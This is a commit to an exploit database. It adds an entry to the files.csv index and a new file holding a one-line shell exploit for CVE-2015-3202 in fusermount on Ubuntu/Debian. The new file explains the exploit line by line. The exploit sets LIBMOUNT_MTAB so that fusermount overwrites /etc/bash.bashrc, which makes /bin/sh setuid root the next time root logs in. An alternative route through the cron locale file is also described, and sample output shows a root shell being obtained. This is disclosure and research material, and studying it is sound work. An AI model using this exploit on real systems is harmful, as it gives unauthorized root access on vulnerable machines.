DB: 2015-05-24
1 new exploits
This commit is contained in:
Offensive Security
parent
a959c54c79
commit
05862802e3
2 changed files with 105 additions and 6 deletions
13
files.csv
13
files.csv
|
|
@ -17687,7 +17687,7 @@ id,file,description,date,author,platform,type,port
|
|||
20356,platforms/windows/webapps/20356.py,"ManageEngine Service Desk Plus 8.1 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20357,platforms/windows/webapps/20357.py,"alt-n mdaemon free 12.5.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20358,platforms/php/webapps/20358.py,"wordpress mini mail dashboard widget 1.42 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20359,platforms/windows/webapps/20359.py,"otrs open technology real services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20359,platforms/windows/webapps/20359.py,"OTRS Open Technology Real Services 3.1.4 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
20360,platforms/php/webapps/20360.py,"wordpress postie plugin 1.4.3 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20361,platforms/php/webapps/20361.py,"wordpress simplemail plugin 1.0.6 - Stored XSS",2012-08-08,loneferret,php,webapps,0
|
||||
20362,platforms/windows/webapps/20362.py,"smartermail free 9.2 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
|
||||
|
|
@ -21865,7 +21865,7 @@ id,file,description,date,author,platform,type,port
|
|||
24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0
|
||||
24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0
|
||||
24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0
|
||||
24922,platforms/multiple/webapps/24922.txt,"OTRS FAQ Module - Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
|
||||
24922,platforms/multiple/webapps/24922.txt,"OTRS 3.x - FAQ Module Persistent XSS",2013-04-08,"Luigi Vezzoso",multiple,webapps,0
|
||||
24707,platforms/multiple/remote/24707.txt,"Google Desktop Search Remote Cross-Site Scripting Vulnerability",2004-10-26,"Salvatore Aranzulla",multiple,remote,0
|
||||
24708,platforms/windows/dos/24708.txt,"Quicksilver Master of Orion III 1.2.5 - Multiple Remote Denial of Service Vulnerabilities",2004-10-27,"Luigi Auriemma",windows,dos,0
|
||||
24889,platforms/php/webapps/24889.txt,"Wordpress Mathjax Latex Plugin 1.1 - CSRF Vulnerability",2013-03-26,"Junaid Hussain",php,webapps,0
|
||||
|
|
@ -23681,8 +23681,8 @@ id,file,description,date,author,platform,type,port
|
|||
26547,platforms/php/webapps/26547.txt,"PHPPost 1.0 mail.php user Parameter XSS",2005-11-21,trueend5,php,webapps,0
|
||||
26548,platforms/hardware/dos/26548.pl,"Cisco PIX TCP SYN Packet Denial of Service Vulnerability",2005-11-22,"Janis Vizulis",hardware,dos,0
|
||||
26549,platforms/php/webapps/26549.txt,"Torrential 1.2 Getdox.PHP Directory Traversal Vulnerability",2005-11-22,Shell,php,webapps,0
|
||||
26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26550,platforms/cgi/webapps/26550.txt,"OTRS 2.0 - Login Function User Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26551,platforms/cgi/webapps/26551.txt,"OTRS 2.0 - AgentTicketPlain Action Multiple Parameter SQL Injection",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26552,platforms/cgi/webapps/26552.txt,"OTRS 2.0 index.pl Multiple Parameter XSS",2005-11-22,"Moritz Naumann",cgi,webapps,0
|
||||
26553,platforms/php/webapps/26553.txt,"Machform Form Maker 2 - Multiple Vulnerabilities",2013-07-02,"Yashar shahinzadeh",php,webapps,0
|
||||
26554,platforms/windows/local/26554.rb,"Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation",2013-07-02,metasploit,windows,local,0
|
||||
|
|
@ -27061,7 +27061,7 @@ id,file,description,date,author,platform,type,port
|
|||
29959,platforms/hardware/webapps/29959.txt,"TVT TD-2308SS-B DVR - Directory Traversal Vulnerability",2013-12-01,"Cesar Neira",hardware,webapps,0
|
||||
29960,platforms/php/webapps/29960.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php Multiple Parameter SQL Injection",2007-05-07,"John Martinelli",php,webapps,0
|
||||
29961,platforms/php/webapps/29961.txt,"TurnkeyWebTools SunShop Shopping Cart 4.0 index.php l Parameter XSS",2007-05-07,"John Martinelli",php,webapps,0
|
||||
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
|
||||
29962,platforms/cgi/webapps/29962.txt,"OTRS 2.0.4 - Index.PL Cross-Site Scripting Vulnerability",2007-05-07,ciri,cgi,webapps,0
|
||||
29963,platforms/php/webapps/29963.txt,"Kayako eSupport 3.0.90 Index.PHP Cross-Site Scripting Vulnerability",2007-05-07,Red_Casper,php,webapps,0
|
||||
29964,platforms/windows/remote/29964.rb,"Trend Micro ServerProtect 5.58 SpntSvc.EXE Remote Stack Based Buffer Overflow Vulnerability",2007-05-07,MC,windows,remote,0
|
||||
29965,platforms/php/webapps/29965.txt,"Advanced Guestbook 2.4.2 Picture.PHP Cross-Site Scripting Vulnerability",2007-05-08,"Jesper Jurcenoks",php,webapps,0
|
||||
|
|
@ -33152,7 +33152,7 @@ id,file,description,date,author,platform,type,port
|
|||
36735,platforms/php/webapps/36735.txt,"Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF",2015-04-13,"Claudio Viviani",php,webapps,0
|
||||
36736,platforms/php/webapps/36736.txt,"Traidnt Up 3.0 - SQL Injection",2015-04-13,"Ali Trixx",php,webapps,0
|
||||
36738,platforms/php/webapps/36738.txt,"Wordpress N-Media Website Contact Form with File Upload 1.3.4 - Shell Upload Vulnerability",2015-04-13,"Claudio Viviani",php,webapps,0
|
||||
36746,platforms/linux/local/36746.c,"Apport/Abrt Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36746,platforms/linux/local/36746.c,"Apport/Abrt - Local Root Exploit",2015-04-14,"Tavis Ormandy",linux,local,0
|
||||
36761,platforms/php/webapps/36761.txt,"WordPress MiwoFTP Plugin 1.0.5 CSRF Arbitrary File Deletion Exploit",2015-04-14,LiquidWorm,php,webapps,80
|
||||
36741,platforms/linux/dos/36741.py,"Samba < 3.6.2 x86 - PoC",2015-04-13,sleepya,linux,dos,0
|
||||
36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
|
||||
|
|
@ -33471,3 +33471,4 @@ id,file,description,date,author,platform,type,port
|
|||
37085,platforms/php/webapps/37085.txt,"Seditio CMS 165 'plug.php' SQL Injection Vulnerability",2012-04-15,AkaStep,php,webapps,0
|
||||
37086,platforms/php/webapps/37086.txt,"WordPress Yahoo Answer Plugin Multiple Cross Site Scripting Vulnerabilities",2012-04-16,"Ryuzaki Lawlet",php,webapps,0
|
||||
37087,platforms/php/webapps/37087.txt,"TeamPass 2.1.5 'login' Field HTML Injection Vulnerability",2012-04-17,"Marcos Garcia",php,webapps,0
|
||||
37089,platforms/linux/local/37089.txt,"Fuse - Local Privilege Escalation",2015-05-23,"Tavis Ormandy",linux,local,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
98
platforms/linux/local/37089.txt
Executable file
98
platforms/linux/local/37089.txt
Executable file
|
|
@ -0,0 +1,98 @@
|
|||
Source: https://gist.github.com/taviso/ecb70eb12d461dd85cba
|
||||
Tweet: https://twitter.com/taviso/status/601370527437967360
|
||||
|
||||
|
||||
|
||||
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.
|
||||
|
||||
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
|
||||
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
|
||||
|
||||
# Here's how it works, $a holds the name of a shellscript to be executed as
|
||||
# root.
|
||||
a=/tmp/.$$;
|
||||
|
||||
# $b is used twice, first to build the contents of shellscript $a, and then as
|
||||
# a command to make $a executable. Quotes are unused to save a character, so
|
||||
# the seperator must be escaped.
|
||||
b=chmod\ u+sx;
|
||||
|
||||
# Build the shellscript $a, which should contain "chmod u+sx /bin/sh", making
|
||||
# /bin/sh setuid root. This only works on Debian/Ubuntu because they use dash,
|
||||
# and dont make it drop privileges.
|
||||
#
|
||||
# http://www.openwall.com/lists/oss-security/2013/08/22/12
|
||||
#
|
||||
echo $b /bin/sh>$a;
|
||||
|
||||
# Now make the $a script executable using the command in $b. This needlessly
|
||||
# sets the setuid bit, but that doesn't do any harm.
|
||||
$b $a;
|
||||
|
||||
# Now make $a the directory we want fusermount to use. This directory name is
|
||||
# written to an arbitrary file as part of the vulnerability, so needs to be
|
||||
# formed such that it's a valid shell command.
|
||||
a+=\;$a;
|
||||
|
||||
# Create the mount point for fusermount.
|
||||
mkdir -p $a;
|
||||
|
||||
# fusermount calls setuid(geteuid()) to reset the ruid when it invokes
|
||||
# /bin/mount so that it can use privileged mount options that are normally
|
||||
# restricted if ruid != euid. That's acceptable (but scary) in theory, because
|
||||
# fusermount can sanitize the call to make sure it's safe.
|
||||
#
|
||||
# However, because mount thinks it's being invoked by root, it allows
|
||||
# access to debugging features via the environment that would not normally be
|
||||
# safe for unprivileged users and fusermount doesn't sanitize them.
|
||||
#
|
||||
# Therefore, the bug is that the environment is not cleared when calling mount
|
||||
# with ruid=0. One debugging feature available is changing the location of
|
||||
# /etc/mtab by setting LIBMOUNT_MTAB, which we can abuse to overwrite arbitrary
|
||||
# files.
|
||||
#
|
||||
# In this case, I'm trying to overwrite /etc/bash.bashrc (using the name of the
|
||||
# current shell from $0...so it only works if you're using bash!).
|
||||
#
|
||||
# The line written by fusermount will look like this:
|
||||
#
|
||||
# /dev/fuse /tmp/.123;/tmp/.123 fuse xxx,xxx,xxx,xxx
|
||||
#
|
||||
# Which will try to execute /dev/fuse with the paramter /tmp/_, fail because
|
||||
# /dev/fuse is a device node, and then execute /tmp/_ with the parameters fuse
|
||||
# xxx,xxx,xxx,xxx. This means executing /bin/sh will give you a root shell the
|
||||
# next time root logs in.
|
||||
#
|
||||
# Another way to exploit it would be overwriting /etc/default/locale, then
|
||||
# waiting for cron to run /etc/cron.daily/apt at midnight. That means root
|
||||
# wouldn't have to log in, but you would have to wait around until midnight to
|
||||
# check if it worked.
|
||||
#
|
||||
# And we have enough characters left for a hash tag/comment.
|
||||
LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
|
||||
|
||||
# Here is how the exploit looks when you run it:
|
||||
#
|
||||
# $ a=/tmp/_;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202
|
||||
# fusermount: failed to open /etc/fuse.conf: Permission denied
|
||||
# sending file descriptor: Socket operation on non-socket
|
||||
# $ cat /etc/bash.bashrc
|
||||
# /dev/fuse /tmp/_;/tmp/_ fuse rw,nosuid,nodev,user=taviso 0 0
|
||||
#
|
||||
# Now when root logs in next...
|
||||
# $ sudo -s
|
||||
# bash: /dev/fuse: Permission denied
|
||||
# # ls -Ll /bin/sh
|
||||
# -rwsr-xr-x 1 root root 121272 Feb 19 2014 /bin/sh
|
||||
# # exit
|
||||
# $ sh -c 'id'
|
||||
# euid=0(root) groups=0(root)
|
||||
#
|
||||
# To repair the damage after testing, do this:
|
||||
#
|
||||
# $ sudo rm /etc/bash.bashrc
|
||||
# $ sudo apt-get install -o Dpkg::Options::="--force-confmiss" --reinstall -m bash
|
||||
# $ sudo chmod 0755 /bin/sh
|
||||
# $ sudo umount /tmp/.$$\;/tmp/.$$
|
||||
# $ rm -rf /tmp/.$$ /tmp/.$$\;
|
||||
#
|
||||
Loading…
Add table
Reference in a new issue